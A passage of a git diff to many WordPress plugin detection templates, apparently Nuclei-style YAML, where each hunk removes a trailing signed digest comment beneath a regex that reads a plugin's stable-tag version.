b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 09d356cf1f..39d269fb85 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202e4932a43310b47b72938e6ae76473fdfd62f85f7a8cd7fcd03a66371fd1e63f022100f95cf2ae9396a91a915d2dc71c1731078526b3da0fcd90f09e497d47fcc64c99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index cd9f7d991c..fc126d83c6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bcde5bc61063cdb6ebe91c4c9164943b2726ca90e79cca225f72768e15de11a902203bdcf41f464a5ea40d905cebe040999afe5d680c6b424c0068c3670d1a072f0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 97ac8ef3f9..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205bcc532659c69b1e545fd543088d252b18447d58018463c968ef1e251f5a7b95022100c32ff3c946d16770659a77ddd84a3046516bac64b4d524af7c731c387e5aab58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index b64377e93a..6ac2212b4b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202528e351b612026f903b4c8ded333dc1d1930bcc3b3532a1ee6453cd0917b17e022039e41003d1967daa3ad9e711265372dcb28de3083ce649bdc62e934468ffe5eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 83497f83fe..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202e0e2af48807db4df1d0fead3f9fc59c5e2c590bb983e09cc0a9f6b52e727b0202203e1574264f18a2c216724cb9ba4537746a382225d6228f040b4fc0f93aefcfbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 971bf1b84c..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203156dad3a0ac60eac295a3a98373136f0a282f951352c094c244bd739214247e022100d23e4ec9ed5f853e5b4eeff6727579fb61b875857125f834fd18b82d1a1e4b1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 7712b5b0f6..286dfdaec6 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220785b2863667108c59109287eec34c362087f5804f459e90270024f9451556797022100fc3758dc3c1103217e8b641d0df133f1e7e5dc6f5abe3cae6e6f2f83d585dc62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0cd403f9f9..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220323ff10d709e4f043cbfee25956e2bb03ff9d5713fad5f52713b9e071ab0a98302206c3c62a17a11ac94827d010f4b024b7defcd7194fa9c8b1151ccd5a7ab2e6c4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index eecaa304d8..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a52851b4c9f1b6c1358cf85d9d7772b87988b2d6303d1ba99848b5a1ab4f8270022100cd144d75e483b6b44f73dd290c3ad7378eb066c6b9b7d9fd2c885b264464fd1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index d7ccaac514..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022063e57dd659e05958288eb0f5b1212610dee605d7d297efe2a713d28d9ac63d15022100802f238d9505d00ae7b4ddb9868adbabecb947962edb92861f270ab286b7def6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 2673b55da1..61a793edf7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206c51137896666dbd906ce8c265222abb251cf9d7bd6adf299d3e8d79000d15ab02202be54811c093bb43f87cb15f4ea3118ac5723b4a8b3bac5b14ac116f31fa124b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 27e08d6e24..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022001755e10ea4669e7e1d2acae330136c78d9bb1a6a0592b85174fd89758e02424022100ad546d37591d2f94289a39579c37f2c100c89ace49480f5dd98251dfd54f18f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 5adc3b3d8e..2b29428cf1 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a32b2efdea579cd3901eb388b7a6f7f13cb572b9dc4807aa80f3ea425658e9800221008fafd0d4a5d3fb161d5749ff8ea38461cc2a1596ab09da568027897f7109d023:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index b78ebf6162..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205f781b0b93457335e92b9088b9ff2bd8df3a834fe82e0297285c517f282e9064022100cba5a744a62a4542f770d61f24b13edb530bf04be92ab3aeebdd9520959d3129:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index d51c2b8ad5..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d0acdb16ce9c1e4955d003b0716b432a5f575347f3e65c9b9a1cefa50574372f02200a3828a3b8f7a836c12ff376a832ecf52f0c235b0e30aa1df687db4ada21ca2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 62b556358e..59554defdf 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204d477bc9c42edc58c05722ced120913c148e6379c95b46a150a0d527ab90eb1902202868236b5700a1e26a746cd27d0d2f2c10d49f579e2614d4d004a61f326c5c0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 764fa2c254..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202f325157461ce894d846e0c83d689cddde761363e0786a80c0e94b7b6c39020102210094edf2ccba11a6076834e0dc12230b8797ee4e57733171cce43a55e05cdfd02e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 0e2285e1d7..2ae6bafbba 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205d744b92508aade6117a743a37898bc44ef21f01a6b7055b8b75c821cd0d6115022100b4778840cb33c0bbed3302480e7084fca20906f205861491ff3d7e32039459f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 8386235618..d0dc8d92bb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e80d66f3749a9a8b8fc2f34fd34fe286b375b60584105901d09fb6a8fed6c33f022100e3e7ac54d8719c401bd6e29cde3b30cd4f0548630f766d867d61cda711498b83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 38c96a7aef..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203b83e72b6db2dc3f1595a9552129fe646538c39c74786d8a1f6b66c6280d1585022100be844eca6c2f20b8f326cc8c4bbc19b62098b151a7fb35c9a0ea0e758d8e71f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index a5942e59e7..27586cbd9d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100806596defb9ed1e683906356a10a824ca8510471decc1265364433ad68f7dd23022024af1bb2b5e97961b0420043cc53909dfb528b5d2afa449d8ae9a74f7c8f109f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 56cc7f2ce4..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100897bf8e4f3fef2550d820897f0d36da3514333b915176650cc766e76717db88802201d14ba70d10b8027d15c98ffe90f0a302fe2a71786f96d8b9eeb32457679fd2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index 5e27827f65..aa29706872 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022075259b082a9294e4b83902658e7fda84ce725bc70aa5d142ff91c31be38b474802206e982c1d948446cb2496805aff866c6c2bd44267c55f3bdbd223c973552cf755:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index ef518ba6b5..290d53ab7e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a1f5e79cbf6197de5e969768c57fd05f1c8d2529000c390482476ae75f533f6f022029d91de5f39bba17c151ac66963d376d67c7ceed3ba6f236903153d113e398a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 5caab88ac1..f7c9ef9b1f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022079c9245f99a8a959a76ac42768a5e7648af845563b1e30df289fb03e3fa47aee02204234df6f275c0eaa7f4e7346c9f88837e9f7402f5179a032884ea34c3ff2c1d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index b48c0f1c81..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207892203cccb4ded710c8343cee0e306bb49b67fb65f7cf97883f7ab9fa6b9d8402200703f1b82f95af3f2126d5b30864daf0d42a5d82aa54c91bdf40b4664e6050de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 858dddeea3..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022023e8539877201c38b646252385537569f3ae9942c08da10cdbc03f57491112c3022100e45f27dbcf811688592fcf1de9d0ae6f53b5ba596475ea6e20076357bad66766:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 857a6bb96a..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201c7087b851921dec3ab0946892412a8f9d650db9990226f9fdcf4afe0195af8a022100e8488585af8e447297c88b48d549b1dfb3b65fe74378f92ed1019add1e4a050f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index c4e1565aca..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201479997689ca88c463b4390ff0ff5f253d03b23ccd46c94b5368161c0e8e28f102206ecdf710f3775a5973226728c36a523d7d434009cb3dc7a13ac052d2fe472eb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 79ae86782e..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022066a055471ab6c2681763996c9140b53ef658669d08a26af28dc2c60599c2e6d5022025d04db322aa8d0be198d768a18e3b6bf3cde3a2def7f7b70041e034221a8717:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 461873c62e..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210083605f1649ee8f2ace7cf69cdbb5768bc9b9d28dad343d7fffaf73eab5de993002201d1336c49c2d8a3e3cd06b3c2f32366c2623cc601dce025d2fa5c349472e0acc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 9542df5a27..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a940fa9cb74550ca9432cbe26ded8b5848ce295f5a75ab997ffe5d662051b43c02204fd61f8553ae2221407581ba57ecf2507f40d871b02151b17b7b199d5041fe7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index 2a4504e435..a773829b7d 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f4887ec192c286460dd5c6f5dd3b4dd26f09c6a8c648c4a86b0fe6f89b487a75022100b7bf7cfefc51711d5781fc018e7c320f3b4be6c2ed6d52dc67ed32268989bbbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 5da393f118..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022025595723b627d47bc8fa072f2da37650a026c7b4ee68bb45c55fbb4b5d8424a0022100f775a956ddfc9915b8a6ebf2b0721ac15afbbf03a1947d39bd51e31254c8df5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index d227059c3a..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a6eb0ef14ca7d1857490e058f483ddaa11844fc6ae9e4e33ab733f9a10c744bf022100913f568d1cd6671547b9d275291fc3603aa63b2c6c091bd9c0e34a94faf38132:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 8626b7e907..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220384861854c8f057531ae4d2a531f4b006a28781f79c655efc57f5eeb7977af5502205590b64ec0e98382f3d52ad4ecd2dabb911c47cbd608dd24aee04ca3a92fb371:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 7fbbe2036e..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022020d2b9bdcbcd1615e472d6437f942a48dfd27aff76e0e3c8858f9c7fb6b7cdaa0221008312b9eaa0fefe599bffd400c3f3f81361241851a29ca3a45e75184c399fc660:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 6579f954cf..10dad2d2fb 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b0c56f21cdfafd94cc17cc4571dbe06c649b78fb8cc84f58aef4a026e85ee2b202210094580408f9ddd92043628610fcc2d9c060e0264077552b21042908efcf9f1805:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index ab5930d1da..e9efe6fb53 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022039a93dfbed66589f343e47683d5c826374296bfa4a9fe462c7c34b80670d96a3022024cb8e6c31a04ae28fa1669248ac838384a4674446c921b91048651b4cb3bb76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 2dddf79ca4..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203911326bcb353778271da58f70c0d87300cae1dca515d06c4e88aaddd33e4520022100e65a6d101b7e02a94d536a3a009b7628dfdd2857a8a1f2c3b3eefa9bf3058fb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index e00221acdf..4a8bc6b75c 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220527c630dd237339dd1c5b15dcc4b32f50ca30c09eefb71fc4fc76af85caef83d022100be4a49fdc13c618ff5d418432348acb45859d18f9c053bcf4fc85dcfa147d304:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index b0c4706a6a..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220277dae256fe1a1af2ff83c4388bf3f2d352efd2232610da482605d71a408760c022100f26a58a64502b253e01f530f22d00d598da4252345a4186992d8bf18d619af88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index e87338d6d1..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201cf1890d14fbba1fea090c686f8b0e7cfb9c8c32ca7baa4f43fca5e7d9d532ef022100e639ffdc5c3273acb6d7191929d035d6862a8712b6ee29b3e7c6c6c3adc94b6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index afc66784f8..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dddaf54256416bf252d429f4e6084d9bd1b461a2d4989763497eb21a49bae5ba022100a98c3d2336a52e47652042c838d155967c7f4f62dd26ee233f4b79ef48a599b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index d742b8abba..f6f6bf5566 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c05e60a208225adbc845b5d6ed9a44b4cfb7452c7631ed8a62ccc8b84f3500d6022100c7f8749f314d7d2821ab447beecdeaa8876fcf3a952e83e5aa24e36c17cdfb99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 4561cdd154..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c12405c1d075a1637dccc3794755d2987897688771db4530db51b9a9652673e1022100af68be9cb83fc95c0a229c6c75ce0ed777c9a4228666ff9d60cdc17b9e626863:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index fbdd300447..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml 